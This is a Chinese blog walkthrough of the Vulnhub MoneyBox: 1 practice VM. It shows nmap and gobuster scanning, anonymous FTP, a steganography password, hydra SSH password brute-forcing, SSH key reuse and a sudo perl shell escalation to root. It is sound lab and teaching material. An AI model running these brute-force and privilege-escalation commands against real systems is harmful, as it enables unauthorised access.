Vulnhub: MoneyBox: 1靶机

最新推荐文章于 2024-06-02 11:15:53 发布
最新推荐文章于 2024-06-02 11:15:53 发布
阅读量192 收藏
点赞数
文章标签: 网络安全 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43884092/article/details/132282481
版权

kali:192.168.111.111

靶机:192.168.111.194

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.194

ftp匿名登录发现trytofind.jpg

目录爆破发现blogs目录

gobuster dir -u http://192.168.111.194 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt

访问后查看源码提示另一个目录S3cr3t-T3xt

访问S3cr3t-T3xt目录查看源码

该密码为图片隐写的密码3xtr4ctd4t4

用提示的用户爆破ssh

hydra -l renu -P /usr/share/wordlists/rockyou.txt 192.168.111.194 -s 22 ssh -t 64

提权

查看/home/lily/.ssh/authorized_keys,发现renu用户可以使用证书登录lily用户

登录后查看sudo权限

ssh lily@192.168.111.194

提权方法:perl | GTFOBins

提升为root

sudo -u root perl -e 'exec "/bin/sh";'

flag

ctostm
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
看完这篇 教你玩转渗透测试靶机vulnhub——MoneyBox: 1
Aluxian_的博客
01-13 1702
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。拿到shell 获取最终的flag,只有拿到root权限才可以发现最终的flag。首先这个靶机比较简单 所以知识点也不多1.信息收集获取ip地址 和端口信息2.FTP匿名登入 隐写工具得使用steghide3.hydra得使用暴力破解4.利用perl进行提权。希望对刚入门得小白有帮助!
VulnHub靶场】——MONEYBOX: 1
Demo不是emo的博客
09-28 3438
​ 今天的博客内容MONEYBOX: 1教程(简单难度),靶场环境来源于VulnHub,该网站有很多虚拟机靶场,靶场入口在这,推荐大家使用,大家进去直接搜索MONEYBOX: 1就能下载今天的靶场了,也可以找我拿,话不多说进入今天的靶场学习 ​
Vulnhub-Moneybox
GALi_233的博客
07-23 736
Description 本次靶机来自vulnhub MONEYBOX 1 。靶机中存在3个flag,本次目标是拿到这3个flag,废话不多说开始把吧。 扫描与服务识别 靶机与Kali处在同一网段,通过二层扫描(arp-scan)同网段的存活IP sudo arp-scan -I eth0 -l # -I 网卡 -l 本地网络 通过判断,192.168.54.250为靶机地址。 扫描该靶机的开放端口 sudo nmap -p- 192.168.54.250 发现21,22,80端口,对这些端口进
【新手向】VulnHub靶场MONEYBOX:1 | 详细解析
YueXuan_521的博客
01-01 1581
【新手向】VulnHub靶场MONEYBOX:1 | 详细解析
看完这篇 教你玩转渗透测试靶机vulnhub——MoneyBox 1_moneybox靶机(3)
2301_82244640的博客
05-12 701
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。拿到shell 获取最终的flag,只有拿到root权限才可以发现最终的flag。
看完这篇 教你玩转渗透测试靶机vulnhub——MoneyBox 1_moneybox靶机(4)
2301_82244640的博客
05-12 691
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。拿到shell 获取最终的flag,只有拿到root权限才可以发现最终的flag。
看完这篇 教你玩转渗透测试靶机vulnhub——MoneyBox 1_moneybox靶机(2)
2301_82244640的博客
05-12 563
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。拿到shell 获取最终的flag,只有拿到root权限才可以发现最终的flag。
Vulnhub_MoneyBox靶机渗透测试
m0_66225311的博客
09-15 230
渗透思路还是一样的,只是本次第一次接触了ftp端口的渗透,也对ftp协议有了一些了解,可以进行匿名登录等利用。这些漏洞可以通过nmap -A全扫描扫描出来毕竟是CTF的靶机,其中参杂了图片隐写的操作,jpg文件的隐写可以使用工具检测出来,或者也就那几个工具,毕竟有学过misc的。而且很多情况还是需要密码的本次ssh用户切换使用到的时公私钥来进行的,将公钥存放在另一个用户内,可以通过自身的私钥来进行ssh登录连接通过sudo -l了解到,本地提权使用到的是sudo。
透测试靶机vulnhub——MoneyBox
m0_70830611的博客
10-15 57
信息收集获取ip地址 和端口信息FTP匿名登入 隐写工具得使用steghidehydra得使用暴力破解利用perl进行提权。
VulnHub靶场MONEYBOX:1
01-05
MONEYBOX:1是VulnHub上的一个靶场环境,提供了虚拟机镜像,可以在本地安装并尝试完成渗透测试任务。这个靶场类似于一个游戏,需要逐步完成各种挑战,提权、漏洞利用、代码审计等,最终获得root权限并发现flag。 在...
moneybox:钱箱应用
05-23
Moneybox OTP应用程序项目结构检索项目后 $ ./mad deps您将在树中找到以下关键应用: ├── apps/moneybox -- N2O based application快速启动引导 ./mad deps compile plan repl生产开始通常,我们使用make console...
Moneybox
10-28
Moneybox
vue实现简单实时汇率计算功能
12-29
最近在自己摸索vue的使用,因为相对于...1、第一步是搭好简单的Html结构 汇率转换 <div class=moneyBox><span>cny</span><input v-model=cny type=text>人民币¥</span></div> <div class=moneyBox><span>
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8259
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
渗透测试之Web安全系列教程(一)
最新发布
fearhacker的专栏
06-02 606
script 标签 的 src 属性,指向跨域脚本的URL地址!如果客户端,是我们自己编制的浏览器,或者是自己编制的可以解析网页内容的脚本,那么,我们是可以突破同源策略限制的!由于 浏览器的同源策略,并没有对 script 等标签进行同源限制,这导致了 恶意黑客 可以利用这一特性,并通过一些 Web 网站中所存在的XSS注入漏洞,将一些恶意的代码(包含 script 相关内容,而 script 的 src 属性的值,可能是指向某个其它域的、包含木马脚本的URL地址)内容嵌入到 Web 网站的指定页面中。
<网络安全VIP>第一篇《工业互联网安全》
Else 的博客
05-28 966
工业互联网的网络是基础,平台是核心,安全是保障。信息化会提高工业化的生产效率,但信息化本身具备两面性。一方面它可以让信息交互更加顺畅,共享更加快捷;但另一方面是带来相应的安全威胁。
HFish蜜罐实践:网络安全防御的主动出击
weixin_43822401的博客
05-29 622
HFish蜜罐作为一种主动防御工具,通过模拟易受攻击的服务,吸引攻击者,不仅能有效捕获攻击行为,还能为安全分析和溯源提供宝贵信息。HFish蜜罐作为一种先进的网络安全防御工具,不仅能够有效地捕获和分析攻击行为,还能为安全专家提供攻击溯源的重要线索。为每个节点配置蜜罐服务,如FTP、SSH、Telnet等,这些服务作为诱饵,用于吸引并捕获攻击者的行为。收集所有连接和攻击节点的IP信息,通过分析这些信息,刻画攻击者画像,构建私有情报库。利用攻击者使用的工具漏洞,进行信息提取和溯源,确定攻击者的身份和来源。
网络安全等级保护,三级等保技术建议书(word原件获取)
2302_79423711的博客
06-02 259
本文末个人名片直接获取所有资料。
CTF网络安全大赛简单的web抓包题目:HEADache
Pythonit教程网
05-20 1114
题目 描  述: > Wanna learn about some types of headache?红客网:blog.hongkewang.cn。”,就能获取到flag,完成题目了。直接在抓包到的页面添加请求头“题目来源于:bugku。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值